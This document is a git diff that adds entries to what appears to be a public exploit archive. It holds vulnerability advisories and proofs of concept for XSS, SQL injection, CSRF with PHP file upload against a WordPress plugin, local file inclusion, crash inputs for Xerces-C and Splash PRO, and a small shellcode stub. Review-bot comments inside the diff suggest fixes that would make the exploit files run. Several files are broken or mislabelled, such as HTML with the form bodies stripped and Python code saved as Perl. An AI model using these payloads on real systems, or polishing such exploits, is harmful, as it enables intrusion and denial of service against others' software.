diff --git a/files.csv b/files.csv
index 7e14feee1..16dc69a64 100755
--- a/files.csv
+++ b/files.csv
@@ -33284,3 +33284,18 @@ id,file,description,date,author,platform,type,port 36889,platforms/php/webapps/36889.txt,"Dotclear 2.4.1.2 /admin/blogs.php nb Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36890,platforms/php/webapps/36890.txt,"Dotclear 2.4.1.2 /admin/comments.php Multiple Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 36891,platforms/php/webapps/36891.txt,"Dotclear 2.4.1.2 /admin/plugin.php page Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 +36892,platforms/php/webapps/36892.html,"Traidnt Topics Viewer 2.0 'main.php' Cross Site Request Forgery Vulnerability",2012-02-29,"Green Hornet",php,webapps,0 +36893,platforms/php/webapps/36893.txt,"Fork CMS 3.x private/en/locale/index name Parameter XSS",2012-02-28,anonymous,php,webapps,0 +36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x backend/modules/error/actions/index.php parse() Function Multiple Parameter Error Display XSS",2012-02-28,anonymous,php,webapps,0 +36895,platforms/php/webapps/36895.txt,"starCMS 'q' Parameter URI Cross Site Scripting Vulnerability",2012-03-02,Am!r,php,webapps,0 +36896,platforms/windows/dos/36896.pl,"Splash PRO 1.12.1 '.avi' File Denial of Service Vulnerability",2012-03-03,"Senator of Pirates",windows,dos,0 +36897,platforms/php/webapps/36897.txt,"LastGuru ASP GuestBook 'View.asp' SQL Injection Vulnerability",2012-03-04,demonalex,php,webapps,0 +36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 +36899,platforms/php/webapps/36899.txt,"Etano 1.20/1.22 photo_search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 +36900,platforms/php/webapps/36900.txt,"Etano 1.20/1.22 photo_view.php return Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0 +36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (MSF)",2015-05-04,"TUNISIAN CYBER",windows,local,0 +36903,platforms/ios/webapps/36903.txt,"Grindr 2.1.1 iOS - Denial of 
Service",2015-05-04,Vulnerability-Lab,ios,webapps,0 +36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - File Include Web Vulnerability",2015-05-04,Vulnerability-Lab,ios,webapps,0 +36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - DoS POC",2015-05-04,beford,linux,dos,0 +36907,platforms/php/webapps/36907.txt,"Wordpress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload",2015-05-04,"Felipe Molina",php,webapps,0 +36908,platforms/lin_x86/shellcode/36908.c,"linux/x86 - exit(0) (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 diff --git a/platforms/ios/webapps/36903.txt b/platforms/ios/webapps/36903.txt new file mode 100755 index 000000000..ced6b8bd4 --- /dev/null +++ b/platforms/ios/webapps/36903.txt 
@@ -0,0 +1,162 @@ +Document Title: +=============== +Grindr 2.1.1 iOS Bug Bounty #2 - Denial of Service Software Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1418 + + +Release Date: +============= +2015-05-02 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1418 + + +Common Vulnerability Scoring System: +==================================== +3.3 + + +Product & Service Introduction: +=============================== +Grindr, which first launched in 2009, has exploded into the largest and most popular all-male location-based social network out there. +With more than 5 million guys in 192 countries around the world -- and approximately 10,000 more new users downloading the app +every day -- you’ll always find a new date, buddy, or friend on Grindr. Grindr is a simple app that uses your mobile device’s +location-based services to show you the guys closest to you who are also on Grindr. How much of your info they see is +entirely your call. + +(Copy of the Vendor Homepage: http://grindr.com/learn-more ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a local and remote denial of servie vulnerability in the official Grindr v2.1.1 iOS mobile web-application. 
+ + +Vulnerability Disclosure Timeline: +================================== +2015-01-22: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security) +2015-01-22: Vendor Notification (Grinder - Bug Bounty Program) +2015-02-02: Vendor Response/Feedback (Grinder - Bug Bounty Program) +2015-04-01: Vendor Fix/Patch (Grindr Developer Team - Reward: x & Manager: x) +2015-05-04: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Grindr LLC +Product: Grinder - iOS Mobile Web Application (API) 2.2.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +A local and remote Denial of Service vulnerability has been discovered in the official Grindr v2.1.1 iOS mobile web-application. + +The attacker injects a script code tag or multiple termination strings (%00%20%00%20%00) to the Display Name input field of the Edit Profile module. +After the inject the service stored the malicious values as DisplayName. After the inject a random user is processing to click in the profile the +contact information (facebook/twitter). After that the victim wants to copy the link and an internal service corruption occurs thats crashs the mobile app. +The issue is local and remote exploitable. + +Vulnerable Module(s): +[+] Edit Profile + +Vulnerable Parameter(s): (Input) +[+] Display Name + +Affected Module(s): +[+] Contact > Social Network > Copy Link + + + +Proof of Concept (PoC): +======================= +The denial of service web vulnerability can be exploited by remote attacker and local user accounts with low user interaction (click). +To demonstrate the vulnerability or to reproduce the issue follow the provided information and steps below to continue. + +Manual steps to reproduce ... +1. Open the grindr mobile application +2. 
Inject a script code tag as Display Name or use the terminated String with empty values +3. Save and click in the profile the contact button (exp. facebook) +4. Click to the send button ahead and push the Copy Link function +5. The app service is getting terminated with an uncaught exception because of an internal parsing error + +Note:To exploit the issue remotly the profile needs to be shared with another user and then the user only needs to push the same way the social contact button. + +PoC Video: + + +Solution - Fix & Patch: +======================= +First step is to prevent the issue by a secure restriction of the input. Attach a own excpetion-handling to prevent next to the insert itself. +The social network accounts that are linked do not allow special chars in the username. The grindr ios app and the android app allows to register +an account and to insert own scripts or null strings that corrupts the process of copy the link by an error. After the restriction has been +set in the code of both (api) the issue can not anymore execute to shutdown anothers users account. Even if this issue execution is prevented that +was only a solution to prevent. + +To fix the bug ... +Connect for example ios device with the running app to windows. Sync the process and reproduce the remote error and local error. Move to the iOS error +folder that has been synced. Get the error attach another debugger and so on ... + + +Security Risk: +============== +The secuirty risk of the local and remote denial of service vulnerability in the copy link function that corrupts is estimated as medium. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. 
Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. 
To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt + + diff --git a/platforms/ios/webapps/36904.txt b/platforms/ios/webapps/36904.txt new file mode 100755 index 000000000..ff2aaf881 --- /dev/null +++ b/platforms/ios/webapps/36904.txt 
@@ -0,0 +1,180 @@ +Document Title: +=============== +PhotoWebsite v3.1 iOS - File Include Web Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1474 + + +Release Date: +============= +2015-05-04 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1476 + + +Common Vulnerability Scoring System: +==================================== +6.6 + + +Product & Service Introduction: +=============================== +Photo Website lets your Camera Roll to become a website. The app let the iphone/ipad become a website. It is a wifi network app, +let you access camera roll photos over your pc browser. Now share Camera Roll to your friend is a very simple event. +Fast browsing of thumbnails + +(https://itunes.apple.com/de/app/photo-website/id543436097) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a locla file include vulnerability in the official PhotoWebsite v3.1 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2015-05-04: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +AirPhoto +Product: PhotoWebsite - iOS Mobile Web Application 3.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local file include web vulnerability has been discovered in the official PhotoWebsite v3.1 iOS mobile web-application. +The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or +system specific path commands to compromise the mobile web-application. + +The web vulnerability is located in the `mDirNameList` and `mDirUrlList` values of the `airphotos.ma - upload` module. 
Remote attackers are +able to inject own files with malicious `mDirNameList` values in the `upload.action` sync request to compromise the mobile web-application. +The local file/path include execution occcurs in the index file dir listing of the wifi interface. The attacker is able to inject the local +file include request by usage of the `wifi interface` in connection with the vulnerable upload service module. + +Remote attackers are also able to exploit the `mDirNameList` and `mDirUrlList` validation issue in combination with persistent injected script +codes to execute unique local malicious attack requests. The attack vector is located on the application-side of the wifi service and the +request method to inject is POST (upload) or Sync(device). To exploit the bug it is required to use the local device > wifi sync or (remote) +the wifi gui. + +The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. +Exploitation of the local file include vulnerability requires no user interaction or privileged web-application user account. Successful exploitation +of the local file include web vulnerability results in mobile application or device compromise. + +Request Method(s): + [+] Sync + +Vulnerable Module(s): + [+] upload + +Vulnerable File(s): + [+] airphotos.ma + +Vulnerable Parameter(s): + [+] mDirNameList + [+] mDirUrlList + +Affected Module(s): + [+] File Dir Index + + +Proof of Concept (PoC): +======================= +The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. 
+ +PoC: airphotos.ma + + + +Reference(s): +http://localhost:1860/airphotos.ma + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure parse and encode of the vulnerable `mDirNameList` and `mDirUrlList` values. +Restrict the input for folder and album names on sync and disallow special chars. +Encode the file dir index list that shows the malicious context without secure parse to prevent further file include or request injection attacks. + + +Security Risk: +============== +The security risk of the local file include web vulnerability in the photowebsite wifi app is estimated as high. (CVSS 6.6) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. 
+ +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt + + diff --git a/platforms/lin_x86/shellcode/36908.c b/platforms/lin_x86/shellcode/36908.c new file mode 100755 index 000000000..e0d7cc5b2 --- /dev/null +++ b/platforms/lin_x86/shellcode/36908.c 
@@ -0,0 +1,14 @@
+/*
+ * linux/x86 exit(0) - 6 bytes
+ * Febriyanto Nugroho
+ */
+
+#include
+
+char shellcode[] = "\xf7\xf0"
+"\xcd\x80"
+"\xeb\xfa";
+
+int main(int argc, char **argv) {
+asm("jmp %0;" : "=m" (shellcode));
+}
\ No newline at end of file
diff --git a/platforms/linux/dos/36906.txt b/platforms/linux/dos/36906.txt
new file mode 100755
index 000000000..afc7328c4
--- /dev/null
+++ b/platforms/linux/dos/36906.txt
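Review bot: The `#include` on the sixth line of the new 36908.c names no header, so the file does not compile as committed; the harness uses nothing from libc, so the line can be dropped or completed as `#include <stdio.h>`. `main` declares `argc` and `argv` but never reads them and falls off the end without a return; reaching the closing brace of `main` is defined to return 0 in C99, but an explicit `return 0;` after the `asm` statement states the intent and avoids a warning on older compilers. The header comment gives only a title and author; a line such as `/* test harness: transfers control to the byte array above */` would tell a reader what the `asm` statement is for.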
@@ -0,0 +1,82 @@ +# Exploit Title: Apache Xerces-C XML Parser (< 3.1.2) DoS POC +# Date: 2015-05-03 +# Exploit Author: beford +# Vendor Homepage: http://xerces.apache.org/#xerces-c +# Version: Versions prior to 3.1.2 +# Tested on: Ubuntu 15.04 +# CVE : CVE-2015-0252 + +Apache Xerces-C XML Parser Crashes on Malformed Input + +I believe this to be the same issue that was reported on CVE-2015-0252, +posting this in case anyone is interested in reproducing it. + +Original advisory: +https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt + +$ printf "\xff\xfe\x00\x00\x3c" > file.xml + +$ DOMPrint ./file.xml # Ubuntu 15.04 libxerces-c3.1 package +Segmentation fault + +$ ./DOMPrint ./file.xml # ASAN Enabled build +================================================================= +==6831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c +at pc 0x836a721 bp 0xbf8127a8 sp 0xbf812798 +READ of size 1 at 0xb5d9d87c thread T0 + #0 0x836a720 in xercesc_3_1::XMLReader::refreshRawBuffer() +xercesc/internal/XMLReader.cpp:1719 + #1 0x836a720 in xercesc_3_1::XMLReader::xcodeMoreChars(unsigned short*, +unsigned char*, unsigned int) xercesc/internal/XMLReader.cpp:1761 + #2 0x837183f in xercesc_3_1::XMLReader::refreshCharBuffer() +xercesc/internal/XMLReader.cpp:576 + #3 0x837183f in xercesc_3_1::XMLReader::peekString(unsigned short +const*) xercesc/internal/XMLReader.cpp:1223 + #4 0x83ad0ae in xercesc_3_1::ReaderMgr::peekString(unsigned short +const*) xercesc/internal/ReaderMgr.hpp:385 + #5 0x83ad0ae in xercesc_3_1::XMLScanner::checkXMLDecl(bool) +xercesc/internal/XMLScanner.cpp:1608 + #6 0x83b6469 in xercesc_3_1::XMLScanner::scanProlog() +xercesc/internal/XMLScanner.cpp:1244 + #7 0x8d69220 in +xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) +xercesc/internal/IGXMLScanner.cpp:206 + #8 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short +const*) xercesc/internal/XMLScanner.cpp:400 + #9 0x83ce728 in 
xercesc_3_1::XMLScanner::scanDocument(char const*) +xercesc/internal/XMLScanner.cpp:408 + #10 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) +xercesc/parsers/AbstractDOMParser.cpp:601 + #11 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398 + #12 0xb6f5272d in __libc_start_main +(/lib/i386-linux-gnu/libc.so.6+0x1872d) + #13 0x805d3b5 (/ramdisk/DOMPrint+0x805d3b5) + +0xb5d9d87c is located 0 bytes to the right of 163964-byte region +[0xb5d75800,0xb5d9d87c) +allocated by thread T0 here: + #0 0xb72c3ae4 in operator new(unsigned int) +(/usr/lib/i386-linux-gnu/libasan.so.1+0x51ae4) + #1 0x8340cce in xercesc_3_1::MemoryManagerImpl::allocate(unsigned int) +xercesc/internal/MemoryManagerImpl.cpp:40 + #2 0x8094cb2 in xercesc_3_1::XMemory::operator new(unsigned int, +xercesc_3_1::MemoryManager*) xercesc/util/XMemory.cpp:68 + #3 0x8daaaa7 in +xercesc_3_1::IGXMLScanner::scanReset(xercesc_3_1::InputSource const&) +xercesc/internal/IGXMLScanner2.cpp:1284 + #4 0x8d6912a in +xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) +xercesc/internal/IGXMLScanner.cpp:198 + #5 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short +const*) xercesc/internal/XMLScanner.cpp:400 + #6 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) +xercesc/internal/XMLScanner.cpp:408 + #7 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) +xercesc/parsers/AbstractDOMParser.cpp:601 + #8 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398 + #9 0xb6f5272d in __libc_start_main +(/lib/i386-linux-gnu/libc.so.6+0x1872d) + +SUMMARY: AddressSanitizer: heap-buffer-overflow +xercesc/internal/XMLReader.cpp:1719 +xercesc_3_1::XMLReader::refreshRawBuffer() diff --git a/platforms/php/webapps/36892.html b/platforms/php/webapps/36892.html new file mode 100755 index 000000000..612884e46 --- /dev/null +++ b/platforms/php/webapps/36892.html 
@@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/52224/info + +Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability. + +Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible. + +Traidnt Topics Viewer 2.0 BETA 1 is vulnerable; other versions may also be affected. + + + +

by:thegreenhornet

+
+ + + +
+ diff --git a/platforms/php/webapps/36893.txt b/platforms/php/webapps/36893.txt new file mode 100755 index 000000000..803c58048 --- /dev/null +++ b/platforms/php/webapps/36893.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52236/info + +Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Fork CMS versions prior to 3.2.7 are vulnerable. + +http://www.example.com/private/en/locale/index?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/36894.txt b/platforms/php/webapps/36894.txt new file mode 100755 index 000000000..ecc3416e2 --- /dev/null +++ b/platforms/php/webapps/36894.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/52236/info + +Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Fork CMS versions prior to 3.2.7 are vulnerable. + +http://www.example.com/private/en/error?type=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E + +http://www.example.com/private/en/error?type=action-not-allowed&querystring=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E.1 \ No newline at end of file diff --git a/platforms/php/webapps/36895.txt b/platforms/php/webapps/36895.txt new file mode 100755 index 000000000..26826354b 
--- /dev/null +++ b/platforms/php/webapps/36895.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/52262/info + +starCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/index.php?q=[Xss]&r=5&lang=de&actionsuche=yes \ No newline at end of file diff --git a/platforms/php/webapps/36897.txt b/platforms/php/webapps/36897.txt new file mode 100755 index 000000000..418f04984 --- /dev/null +++ b/platforms/php/webapps/36897.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/52293/info + +LastGuru ASP GuestBook is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/victim/View.asp?E_Mail=webmaster@lastguru.com' and 'a'='a \ No newline at end of file diff --git a/platforms/php/webapps/36898.txt b/platforms/php/webapps/36898.txt new file mode 100755 index 000000000..f2842fef4 --- /dev/null +++ b/platforms/php/webapps/36898.txt 
@@ -0,0 +1,31 @@ +source: http://www.securityfocus.com/bid/52295/info + +Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected. + +http://www.example.com/etano/search.php?'";> + +http://www.example.com/etano/search.php?st='";> + +http://www.example.com/etano/search.php?f17_city='";>&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1 + +http://www.example.com/etano/search.php?f17_city=0&f17_country='";>&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1 + +http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state='";>&f17_zip=3&f19=0&st=basic&wphoto=1 + +http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip='";>&f19=0&st=basic&wphoto=1 + +http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19='";>&st=basic&wphoto=1 + +http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st='";>&wphoto=1 + +http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto='";> + +http://www.example.com/etano/search.php?search='";>&v=g + +http://www.example.com/etano/search.php?search=51d43831f5dde83a4eedb23895f165f6&v='";> + +http://www.example.com/etano/search.php?st=xss";>&user=unknown diff --git a/platforms/php/webapps/36899.txt b/platforms/php/webapps/36899.txt new file mode 100755 index 000000000..f55ceecb1 --- /dev/null +++ b/platforms/php/webapps/36899.txt 
@@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/52295/info + +Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected. + +http://www.example.com/etano/photo_search.php?'";> + +http://www.example.com/etano/photo_search.php?st='";> \ No newline at end of file diff --git a/platforms/php/webapps/36900.txt b/platforms/php/webapps/36900.txt new file mode 100755 index 000000000..e2e85f3a9 --- /dev/null +++ b/platforms/php/webapps/36900.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52295/info + +Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected. + +http://www.example.com/etano/photo_view.php?photo_id=1&return=";> \ No newline at end of file diff --git a/platforms/php/webapps/36907.txt b/platforms/php/webapps/36907.txt new file mode 100755 index 000000000..7295bace2 --- /dev/null +++ b/platforms/php/webapps/36907.txt 
@@ -0,0 +1,144 @@ +# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate +Product Catalogue 3.1.2 +# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" +intext:"Category", +inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/" +# Date: 22/04/2015 +# Exploit Author: Felipe Molina de la Torre (@felmoltor) +# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/ +# Software Link: +https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip +# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.5 +# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache +2.4.0 (Ubuntu) +# CVE : N/A +# Category: webapps + +1. Summary: + +Ultimate Product Catalogue is a responsive and easily customizable plugin +for all your product catalogue needs. It has +63.000 downloads, +4.000 +active installations. + +Product Name and Description and File Upload formulary of plugin Ultimate +Product Catalog lacks of proper CSRF protection and proper filtering. +Allowing an attacker to alter a product pressented to a customer or the +wordpress administrators and insert XSS in his product name and +description. It also allows an attacker to upload a php script though a +CSRF due to a lack of file type filtering when uploading it. + +2. Vulnerability timeline: +- 22/04/2015: Identified in version 3.1.2 +- 22/04/2015: Comunicated to developer company etoilewebdesign.com + +- 22/04/2015: Response from etoilewebdesign.com + + and fixed two SQLi in 3.1.3 but not these vulnerabilities. + - 28/04/2015: Fixed version in 3.1.5 without notifying me. + +3. Vulnerable code: + + In file html/ProductPage multiple lines. + +3. 
Proof of concept: + +https://www.youtube.com/watch?v=roB_ken6U4o + + + ---------------------------------------------------------------------------------------------- + ------------- CSRF & XSS in Product Description and Name ----------- + + ---------------------------------------------------------------------------------------------- + + +
+ + + + + + + + + + + + + + +
+ + + + + ---------------------------------------------------------------------------------------------- + -------- CSRF & File Upload in Product Description and Name ------ + + ---------------------------------------------------------------------------------------------- + + + + +
+ +
+ + + +Te file cooldog.php is no available in path http:// +/wp-content/plugins/ultimate-product-catalogue/product-sheets/cooldog.php + + +4. Solution: + + Update to version 3.1.5 diff --git a/platforms/windows/dos/36896.pl b/platforms/windows/dos/36896.pl new file mode 100755 index 000000000..c3216659e --- /dev/null +++ b/platforms/windows/dos/36896.pl @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/52273/info + +Splash PRO is prone to a denial-of-service vulnerability. + +Attackers can exploit this issue to crash the affected application, denying service to legitimate users. + +Splash PRO 1.12.1 is vulnerable; other versions may also be affected. + +PoC = "\x52\x49\x46\x46\x3c\xad\x08\x00\x41\x56\x49\x20\x4c\x49\x53\x54" +PoC += "\x72\x22\x00\x00\x68\x64\x72\x6c" +payload = (PoC) +f = open("Crash.avi","wb") +f.write(payload) +f.close() \ No newline at end of file diff --git a/platforms/windows/local/36909.rb b/platforms/windows/local/36909.rb new file mode 100755 index 000000000..3b3603d7a --- /dev/null +++ b/platforms/windows/local/36909.rb 
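Review bot: The new file platforms/windows/dos/36896.pl is Python source (`open("Crash.avi","wb")`, `f.write(payload)`, `f.close()`), yet it is committed with a `.pl` extension and the files.csv row in the first hunk indexes it under that name, so running it with `perl` fails with a syntax error; the file should be renamed to `.py` and the files.csv entry updated to match. The handle is also closed by hand, which leaks it if the write raises; `with open("Crash.avi", "wb") as f:` followed by `f.write(payload)` closes it on every path. The intermediate `payload = (PoC)` adds nothing over writing `PoC` directly.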
